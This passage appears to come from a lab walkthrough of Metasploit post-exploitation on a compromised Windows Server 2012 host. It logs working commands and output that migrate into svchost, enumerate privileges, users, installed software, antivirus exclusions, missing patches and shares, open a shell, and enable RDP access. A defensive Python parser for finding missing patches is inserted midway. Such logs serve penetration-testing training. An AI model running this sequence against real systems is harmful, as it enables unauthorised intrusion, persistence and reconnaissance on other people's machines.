KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID 0 no PID of process to migrate to.
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
PPID_NAME no Name of process for PPID spoofing when creating a new process.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If set, notepad.exe is used.
msf5 post(windows/manage/migrate) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/migrate) > run
[*] Running module against WIN-OMCNBKR66MN
[*] Current server process: Explorer.EXE (2236)
[-] Post failed: NoMethodError undefined method `downcase' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:46:in `block in []'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each_process'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:45:in `[]'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:81:in `create_temp_proc'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:47:in `run'
[*] Post module execution completed
msf5 post(windows/manage/migrate) > use post/windows/manage/archmigrate
msf5 post(windows/manage/archmigrate) > show options
Module options (post/windows/manage/archmigrate):
Name Current Setting Required Description
---- --------------- -------- -----------
EXE C:\windows\sysnative\svchost.exe yes The executable to start and migrate into
FALLBACK true yes If the selected migration executable does not exist fallback to a sysnative file
IGNORE_SYSTEM false yes Migrate even if you have SYSTEM privileges
SESSION yes The session to run this module on.
msf5 post(windows/manage/archmigrate) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/archmigrate) > run
[*] You're not running as SYSTEM. Moving on...
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2424
[*] Migrating..
[+] Success!
[*] Post module execution completed
msf5 post(windows/manage/migrate) > use post/windows/gather/win_privs
msf5 post(windows/gather/win_privs) > show options
Module options (post/windows/gather/win_privs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/win_privs) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/win_privs) > run
Current User
============
Is Admin Is System Is In Local Admin Group UAC Enabled Foreground ID UID
-------- --------- ----------------------- ----------- ------------- ---
True False True True 1 WIN-OMCNBKR66MN\Administrator
Windows Privileges
==================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
[*] Post module execution completed
msf5 post(windows/gather/win_privs) > search enum_logged_on
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_logged_on_users normal No Windows Gather Logged On User Enumeration (Registry)
msf5 post(windows/gather/win_privs) > use post/windows/gather/enum_logged_on_users
msf5 post(windows/gather/enum_logged_on_users) > show options
Module options (post/windows/gather/enum_logged_on_users):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently logged on users
RECENT true yes Enumerate Recently logged on users
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-2563855374-3215282501-1490390052-500 WIN-OMCNBKR66MN\Administrator
[+] Results saved in: /root/.msf4/loot/20230212174420_windows_post_10.0.29.158_host.users.activ_793533.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-2563855374-3215282501-1490390052-500 C:\Users\Administrator
[*] Post module execution completed
msf5 post(windows/gather/enum_logged_on_users) > search checkvm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/linux/gather/checkvm normal No Linux Gather Virtual Environment Detection
1 post/solaris/gather/checkvm normal No Solaris Gather Virtual Environment Detection
2 post/windows/gather/checkvm normal No Windows Gather Virtual Environment Detection
msf5 post(windows/gather/enum_logged_on_users) > use post/windows/gather/checkvm
msf5 post(windows/gather/checkvm) > show options
Module options (post/windows/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/checkvm) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/checkvm) > run
[*] Checking if WIN-OMCNBKR66MN is a Virtual Machine .....
[+] This is a Xen Virtual Machine
[*] Post module execution completed
Target IP Address: 10.0.22.100
msf5 post(windows/manage/archmigrate) > search enum_applications
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_applications normal No Windows Gather Installed Application Enumeration
msf5 post(windows/manage/archmigrate) > use post/windows/gather/enum_applications
msf5 post(windows/gather/enum_applications) > show options
Module options (post/windows/gather/enum_applications):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_applications) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_applications) > run
[*] Enumerating applications installed on WIN-OMCNBKR66MN
Installed Applications
======================
Name Version
---- -------
AWS PV Drivers 8.3.3
AWS Tools for Windows 3.15.1084
Amazon SSM Agent 2.3.842.0
Amazon SSM Agent 2.3.842.0
EC2ConfigService 4.9.4222.0
EC2ConfigService 4.9.4222.0
EC2ConfigService 4.9.4222.0
Mozilla Firefox 80.0.1 (x86 en-US) 80.0.1
Mozilla Maintenance Service 80.0.1
aws-cfn-bootstrap 1.4.33
[+] Results stored in: /root/.msf4/loot/20230212181713_windows_post_10.0.22.100_host.application_881038.txt
[*] Post module execution completed
msf5 post(windows/gather/enum_applications) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
10.0.22.100 host.applications applications.txt text/plain Installed Applications /root/.msf4/loot/20230212181713_windows_post_10.0.22.100_host.application_881038.txt
msf5 post(windows/gather/enum_applications) > search type:post platform:windows enum_av
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_av_excluded normal No Windows Antivirus Exclusions Enumeration
msf5 post(windows/gather/enum_applications) > use post/windows/gather/enum_av_excluded
msf5 post(windows/gather/enum_av_excluded) > show options
Module options (post/windows/gather/enum_av_excluded):
Name Current Setting Required Description
---- --------------- -------- -----------
DEFENDER true yes Enumerate exclusions for Microsoft Defender
ESSENTIALS true yes Enumerate exclusions for Microsoft Security Essentials/Antimalware
SEP true yes Enumerate exclusions for Symantec Endpoint Protection (SEP)
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_av_excluded) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_av_excluded) > run
[*] Enumerating Excluded Paths for AV on WIN-OMCNBKR66MN
[+] Found Windows Defender
[*] No extension exclusions for Windows Defender
[*] No path exclusions for Windows Defender
[*] No process exclusions for Windows Defender
[*] Post module execution completed
msf5 post(windows/gather/enum_av_excluded) > search enum_computers
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_computers normal No Windows Gather Enumerate Computers
msf5 post(windows/gather/enum_av_excluded) > use post/windows/gather/enum_computers
msf5 post(windows/gather/enum_computers) > show options
Module options (post/windows/gather/enum_computers):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_computers) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_computers) > run
[*] Running module against WIN-OMCNBKR66MN
[-] This host is not part of a domain.
[*] Post module execution completed
msf5 post(windows/gather/enum_computers) > search enum_patches
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_patches normal No Windows Gather Applied Patches
msf5 post(windows/gather/enum_computers) > use post/windows/gather/enum_patches
msf5 post(windows/gather/enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patches for which there is a MSF local module
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_patches) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_patches) > run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
msf5 post(windows/gather/enum_patches) > sessions 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2808 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\hfs>systeminfo
systeminfo
Host Name: WIN-OMCNBKR66MN
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00252-70000-00000-AA535
Original Install Date: 9/10/2020, 9:10:37 AM
System Boot Time: 2/12/2023, 12:23:27 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 1,024 MB
Available Physical Memory: 573 MB
Virtual Memory: Max Size: 9,216 MB
Virtual Memory: Available: 8,614 MB
Virtual Memory: In Use: 602 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\WIN-OMCNBKR66MN
Hotfix(s): 208 Hotfix(s) Installed.
[01]: KB2894856
[02]: KB2896496
[03]: KB2919355
[04]: KB2919442
[05]: KB2934520
[06]: KB2938066
[07]: KB2938772
[08]: KB2949621
[09]: KB2954879
[10]: KB2955164
[11]: KB2959626
[12]: KB2965500
[13]: KB2967917
[14]: KB2969339
[15]: KB2971203
[16]: KB2973448
[17]: KB2975061
[18]: KB2975719
[19]: KB2977765
[20]: KB2978041
[21]: KB2978126
[22]: KB2984006
[23]: KB2989647
[24]: KB2989930
[25]: KB2993100
[26]: KB2995004
[27]: KB2995388
[28]: KB2996799
[29]: KB2998174
[30]: KB2999226
[31]: KB3000483
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3012199
[36]: KB3012702
[37]: KB3013172
[38]: KB3013769
[39]: KB3013791
[40]: KB3013816
[41]: KB3014442
[42]: KB3019978
[43]: KB3021910
[44]: KB3022345
[45]: KB3023222
[46]: KB3023266
[47]: KB3024751
[48]: KB3024755
[49]: KB3030947
[50]: KB3032663
[51]: KB3033446
[52]: KB3035126
[53]: KB3036612
[54]: KB3037579
[55]: KB3038002
[56]: KB3038701
[57]: KB3042085
[58]: KB3044374
[59]: KB3044673
[60]: KB3045634
[61]: KB3045685
[62]: KB3045717
[63]: KB3045719
[64]: KB3045755
[65]: KB3045999
[66]: KB3046017
[67]: KB3046737
[68]: KB3054169
[69]: KB3054203
[70]: KB3054256
[71]: KB3054464
[72]: KB3055323
[73]: KB3055343
[74]: KB3055642
[75]: KB3059317
[76]: KB3060681
[77]: KB3060793
[78]: KB3061512
[79]: KB3063843
[80]: KB3064209
[81]: KB3068708
[82]: KB3071756
[83]: KB3074228
[84]: KB3074548
[85]: KB3075853
[86]: KB3077715
[87]: KB3078405
[88]: KB3078676
[89]: KB3080149
[90]: KB3082089
[91]: KB3083325
[92]: KB3083711
[93]: KB3084135
[94]: KB3084905
[95]: KB3086255
[96]: KB3087137
[97]: KB3091297
[98]: KB3094486
[99]: KB3095701
[100]: KB3097997
[101]: KB3098779
[102]: KB3099834
[103]: KB3100473
[104]: KB3102429
[105]: KB3102467
[106]: KB3102812
[107]: KB3103616
[108]: KB3103696
[109]: KB3103709
[110]: KB3109103
[111]: KB3109976
[112]: KB3110329
[113]: KB3112148
[114]: KB3112336
[115]: KB3115224
[116]: KB3118401
[117]: KB3121261
[118]: KB3122654
[119]: KB3123245
[120]: KB3126434
[121]: KB3126587
[122]: KB3127226
[123]: KB3133043
[124]: KB3133690
[125]: KB3134179
[126]: KB3134815
[127]: KB3135449
[128]: KB3137728
[129]: KB3138602
[130]: KB3138615
[131]: KB3139164
[132]: KB3139398
[133]: KB3139914
[134]: KB3140219
[135]: KB3140234
[136]: KB3141092
[137]: KB3145384
[138]: KB3145432
[139]: KB3146604
[140]: KB3146723
[141]: KB3146751
[142]: KB3147071
[143]: KB3148851
[144]: KB3155784
[145]: KB3156059
[146]: KB3156418
[147]: KB3159398
[148]: KB3161949
[149]: KB3162343
[150]: KB3162835
[151]: KB3172614
[152]: KB3172729
[153]: KB3173424
[154]: KB3175024
[155]: KB3178539
[156]: KB3179574
[157]: KB3179948
[158]: KB3186539
[159]: KB3195387
[160]: KB3210135
[161]: KB4014510
[162]: KB4024847
[163]: KB4033369
[164]: KB4033428
[165]: KB4040972
[166]: KB4041777
[167]: KB4043763
[168]: KB4054566
[169]: KB4054854
[170]: KB4054980
[171]: KB4055001
[172]: KB4056898
[173]: KB4073700
[174]: KB4096417
[175]: KB4098972
[176]: KB4338419
[177]: KB4344145
[178]: KB4457015
[179]: KB4457034
[180]: KB4459941
[181]: KB4470639
[182]: KB4480054
[183]: KB4480095
[184]: KB4483450
[185]: KB4486105
[186]: KB4486545
[187]: KB4495585
[188]: KB4504418
[189]: KB4506993
[190]: KB4506996
[191]: KB4511524
[192]: KB4512938
[193]: KB4514361
[194]: KB4515846
[195]: KB4519567
[196]: KB4521864
[197]: KB4524445
[198]: KB4532940
[199]: KB4533004
[200]: KB4534134
[201]: KB4537482
[202]: KB4540725
[203]: KB4552933
[204]: KB4562253
[205]: KB4565635
[206]: KB4566425
[207]: KB4569753
[208]: KB4571703
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet 2
DHCP Enabled: Yes
DHCP Server: 10.0.16.1
IP address(es)
[01]: 10.0.22.100
[02]: fe80::4c22:3b30:ebf7:d602
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\hfs>^C
Terminate channel 1? [y/N] y
meterpreter > background
[*] Backgrounding session 1...
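The same check that enum_patches performs against the KB option, done from the defender's side on a saved systeminfo dump, as an added example that is not part of the original page or of Metasploit: it parses the Hotfix(s) section of systeminfo output (a constructed sample in the layout shown above, with KB ids taken from the session) and reports which KBs from a required list are absent, refusing a dump whose entry count does not match the declared count.

```python
import re

# Constructed sample in the layout systeminfo prints; only a few hotfixes are kept
# and the KB ids are taken from the session shown above.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-OMCNBKR66MN
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2894856
                           [02]: KB2919355
                           [03]: KB3000850
                           [04]: KB4571703
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
"""

HOTFIX_HEADER = re.compile(r"^Hotfix\(s\):\s+(\d+)\s+Hotfix\(s\) Installed\.", re.M)
HOTFIX_ENTRY = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.M)
NEXT_KEY = re.compile(r"^[A-Za-z][^\n]*:", re.M)  # next "Key:" line ends the section


def parse_hotfixes(text: str) -> set[str]:
    """Return the KB ids listed under Hotfix(s).

    Only lines between the Hotfix(s) header and the next "Key:" line are read,
    so the "[01]: AWS PV Network Device" entry under Network Card(s) is ignored.
    The declared count is cross-checked so a truncated dump is not silently
    reported as fully patched. Works on indented and whitespace-stripped dumps.
    """
    header = HOTFIX_HEADER.search(text)
    if not header:
        return set()
    rest = text[header.end():]
    nxt = NEXT_KEY.search(rest)
    section = rest[: nxt.start()] if nxt else rest
    found = set(HOTFIX_ENTRY.findall(section))
    declared = int(header.group(1))
    if len(found) != declared:
        raise ValueError(f"header declares {declared} hotfixes, parsed {len(found)}")
    return found


def missing_patches(text: str, required: list[str]) -> list[str]:
    """KBs from `required` (same format as the enum_patches KB option) absent on the host."""
    installed = parse_hotfixes(text)
    return [kb for kb in required if kb.upper() not in installed]


if __name__ == "__main__":
    # enum_patches' default KB list plus one KB that the sample does have.
    print(missing_patches(SAMPLE_SYSTEMINFO, ["KB2871997", "KB2928120", "KB2919355"]))
```

The same function works on the full 208-entry dump above once it is saved to a file; a count mismatch means the capture was cut off and should be retaken rather than trusted.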
msf5 post(windows/gather/enum_patches) > search enum_shares
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_shares normal No Windows Gather SMB Share Enumeration via Registry
msf5 post(windows/gather/enum_patches) > use post/windows/gather/enum_shares
msf5 post(windows/gather/enum_shares) > show options
Module options (post/windows/gather/enum_shares):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently configured shares
ENTERED true yes Enumerate Recently entered UNC Paths in the Run Dialog
RECENT true yes Enumerate Recently mapped shares
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_shares) > run
[*] Running against session 1
[*] The following shares were found:
[*] Name: print$
[*]
[*] Post module execution completed
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/windows/manage/enable_rdp
msf5 post(windows/manage/enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to forward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
msf5 post(windows/manage/enable_rdp) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/enable_rdp) > run
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230212195354_default_10.0.24.125_host.windows.cle_988922.txt
[*] Post module execution completed